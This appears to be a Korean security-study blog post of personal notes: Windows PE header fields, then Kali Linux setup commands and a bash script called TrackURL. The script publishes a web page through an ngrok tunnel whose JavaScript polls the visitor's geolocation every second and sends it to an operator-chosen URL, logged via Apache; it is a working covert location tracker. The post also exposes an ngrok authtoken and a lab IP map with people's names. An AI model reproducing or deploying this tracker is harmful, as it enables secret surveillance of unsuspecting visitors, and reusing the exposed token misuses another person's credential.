μƒˆμ†Œμ‹

인기 검색어

πŸ“  Secure

2022-06-21

  • -
λ°˜μ‘ν˜•

*μœˆλ„μš° PE

1. Windows Preinstallation Environment
2. Windows Portable Executable



1. Dos Header  -> μ‹œκ·Έλ‹ˆμ³ μ½”λ“œκ°€ MZλ‹€
2. Dos Stub -> μ˜λ―Έμ—†λŠ” μ½”λ“œλ‘œ λ§ˆμŒλŒ€λ‘œ λ³€κ²½ν•΄λ„ μ‹€ν–‰μ— λ¬Έμ œκ°€ μ—†λ‹€.
3. NT Header
3-1) Signature -> μ‹œκ·Έλ‹ˆμ³ μ½”λ“œκ°€ PEλ‹€
3-2) File Header
  WORD  Machine; -> ν˜„μž¬ μ»΄ν“¨ν„°μ˜ μ’…λ₯˜ 014C
  WORD  NumberOfSections;  -> μ„Ήμ…˜μ˜ κ°œμˆ˜ 0003
  DWORD TimeDateStamp; -> μƒμ„±μ‹œκ°„ 48025287
  DWORD PointerToSymbolTable;
  DWORD NumberOfSymbols;
  WORD  SizeOfOptionalHeader; -> Optional Header의 ν¬κΈ° 00E0
  WORD  Characteristics;  -> ν•΄λ‹Ή νŒŒμΌμ˜ κΈ°λŠ₯  010F
3-3) Optional Header
  WORD                 Magic;  -> μ‹€ν–‰νŒŒμΌμ˜ μ’…λ₯˜ 010B 
  BYTE                 MajorLinkerVersion;
  BYTE                 MinorLinkerVersion;
  DWORD                SizeOfCode;
  DWORD                SizeOfInitializedData;
  DWORD                SizeOfUninitializedData;
  DWORD                AddressOfEntryPoint;   ->파일이 μ‹€ν–‰λ˜λ©΄μ„œ λ©”λͺ¨λ¦¬μ— μ˜¬λΌκ°ˆλ•Œ μ‹œμž‘점이 λ˜λŠ” μ£Όμ†Œ 0000739D
  DWORD                BaseOfCode; -> μ½”λ“œμ˜μ—­μ˜ μ‹œμž‘점
  DWORD                BaseOfData; -> λ°μ΄νƒ€μ˜μ—­μ˜ μ‹œμž‘점
  DWORD                ImageBase; -> 01000000
  DWORD                SectionAlignment; -> λ©”λͺ¨λ¦¬ ν˜•νƒœμΌ λ•Œ λ°°μˆ˜μ˜ κΈ°μ€€
  DWORD                FileAlignment; -> νŒŒμΌ ν˜•νƒœμΌ λ•Œ λ°°μˆ˜μ˜ κΈ°μ€€
  WORD                 MajorOperatingSystemVersion;
  WORD                 MinorOperatingSystemVersion;
  WORD                 MajorImageVersion;
  WORD                 MinorImageVersion;
  WORD                 MajorSubsystemVersion;
  WORD                 MinorSubsystemVersion;
  DWORD                Win32VersionValue;
  DWORD                SizeOfImage; -> λ©”λͺ¨λ¦¬ ν˜•νƒœμΌ λ•Œ ν¬κΈ°
  DWORD                SizeOfHeaders; -> ν—€λ”μ˜ ν¬κΈ°
  DWORD                CheckSum;
  WORD                 Subsystem; -> μ‹€ν–‰ν–ˆμ„ λ•Œ ν™”λ©΄ κ΅¬μ„±(CUI, GUI λ“±)
  WORD                 DllCharacteristics;
  DWORD                SizeOfStackReserve;
  DWORD                SizeOfStackCommit;
  DWORD                SizeOfHeapReserve;
  DWORD                SizeOfHeapCommit;
  DWORD                LoaderFlags;
  DWORD                NumberOfRvaAndSizes;
  IMAGE_DATA_DIRECTORY DataDirectory
4. text(code) Header
5. data Header
6. rsrc Header

7. text(code) Section
8. data Section
9. rsrc Section




----------------------
sudo passwd root
kali
toor
toor

TrackURL

apt-get update

apt-get install gedit


service apache2 start == systemctl start httpd

gnome-terminal -e './ngrok http 80'

apt-get install gnome-terminal
apt-get install xterm



'./ngrok config add-authtoken 2AsCJD6nlqu4BI8CEoIZKAZaVJJ_884HESRjtSZscmWHS9EFG'
#!/bin/bash

#64_bit
#xterm -e ./ngrok http 80 & clear

#32_Bit
gnome-terminal -e './ngrok http 80'
'./ngrok config add-authtoken 2AsCJD6nlqu4BI8CEoIZKAZaVJJ_884HESRjtSZscmWHS9EFG'

echo "            ______________________________________________________   
            7      77  _  77  _  77     77  7  77  7  77  _  77  7   
            !__  __!|    _||  _  ||  ___!|   __!|  |  ||    _||  |   
              7  7  |  _ \ |  7  ||  7___|     ||  |  ||  _ \ |  !___
              |  |  |  7  ||  |  ||     7|  7  ||  !  ||  7  ||     7
              !__!  !__!__!!__!__!!_____!!__!__!!_____!!__!__!!_____!
                                                                     "
sleep 5
read -p '           URL: ' varurl
echo "<!DOCTYPE html>

<html>
    <head>
        <title> γ„΄γ…γ…‡γ„Ήγ„΄γ…γ…‡γ„Ή </title>
        <style type=\"text/css\">
            
            body {
                background-image: url(\"skull.jpg\");
                background-size: 1000px 1600px;
                background-repeat: no-repeat;
            }

        </style>
    </head>
    <body>

        <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js\" type='text/javascript' ></script>
        <script type='text/javascript'>
        function httpGet(theUrl)
        {
            var xmlHttp = new XMLHttpRequest();
            xmlHttp.open( \"GET\", theUrl, false ); // false for synchronous request
            xmlHttp.send( null );
            return xmlHttp.responseText;
        }


        function autoUpdate() {
          navigator.geolocation.getCurrentPosition(function(position) {
            coords = position.coords.latitude + \",\" + position.coords.longitude;
             url = \""$varurl"/logme/\" + coords;
            httpGet(url);
            console.log('should be working');
            setTimeout(autoUpdate, 1000);
        })
        };
        \$(document).ready(function(){
           autoUpdate();
        });

        </script>
    </body>
</html>" > index.html

mv index.html /var/www/html/index.html
cp skull.jpg /var/www/html/skull.jpg
service apache2 start
echo "         ______________________________________________________   
         7      77  _  77  _  77     77  7  77  7  77  _  77  7   
         !__  __!|    _||  _  ||  ___!|   __!|  |  ||    _||  |   
           7  7  |  _ \ |  7  ||  7___|     ||  |  ||  _ \ |  !___
           |  |  |  7  ||  |  ||     7|  7  ||  !  ||  7  ||     7
           !__!  !__!__!!__!__!!_____!!__!__!!_____!!__!__!!_____!
                                                                  " > /var/log/apache2/access.log
xterm -e tail -f /var/log/apache2/access.log &
clear
exit





/usr/binμ—μ„œ
google-chrome-stable νŒŒμΌ

--user-data-dir --test-type --no-sandbox

----μž…λ ₯κΈ° μ„€μΉ˜----
apt-get install fcitx-lib*

apt-get install fcitx-hangul



------------------------------------------------
κ°•μˆœκ΅¬[192.168.0.20] : 192.168.100.11(κΉ€μ •ν˜œ)
  192.168.250.11(μœ€μ±„μ€)
20001 / 20002
------------------------------------------------
κΉ€μ •ν˜œ[192.168.0.30] : 192.168.150.10(λ°•μ •ν˜)
                192.168.100.10(κ°•μˆœκ΅¬)
30001 / 30002
------------------------------------------------
μœ€μ±„μ€[192.168.0.40] : 192.168.200.10(λ°•μ •ν˜)
  192.168.250.10(κ°•μˆœκ΅¬)
40001 / 40002
------------------------------------------------
λ°•μ •ν˜[192.168.0.200] : 192.168.150.11(κΉ€μ •ν˜œ)
    192.168.200.11(μœ€μ±„μ€)
50001/ 50002
------------------------------------------------









λ°˜μ‘ν˜•

'πŸ“  Secure' μΉ΄ν…Œκ³ λ¦¬μ˜ λ‹€λ₯Έ κΈ€

2022-06-23  (0) 2022.06.28
2022-06-22  (0) 2022.06.28
2022-06-20  (0) 2022.06.28
2022-06-16  (0) 2022.06.28
DLL Ejection  (0) 2022.06.28
Contents

ν¬μŠ€νŒ… μ£Όμ†Œλ₯Ό λ³΅μ‚¬ν–ˆμŠ΅λ‹ˆλ‹€

이 글이 도움이 λ˜μ—ˆλ‹€λ©΄ 곡감 λΆ€νƒλ“œλ¦½λ‹ˆλ‹€.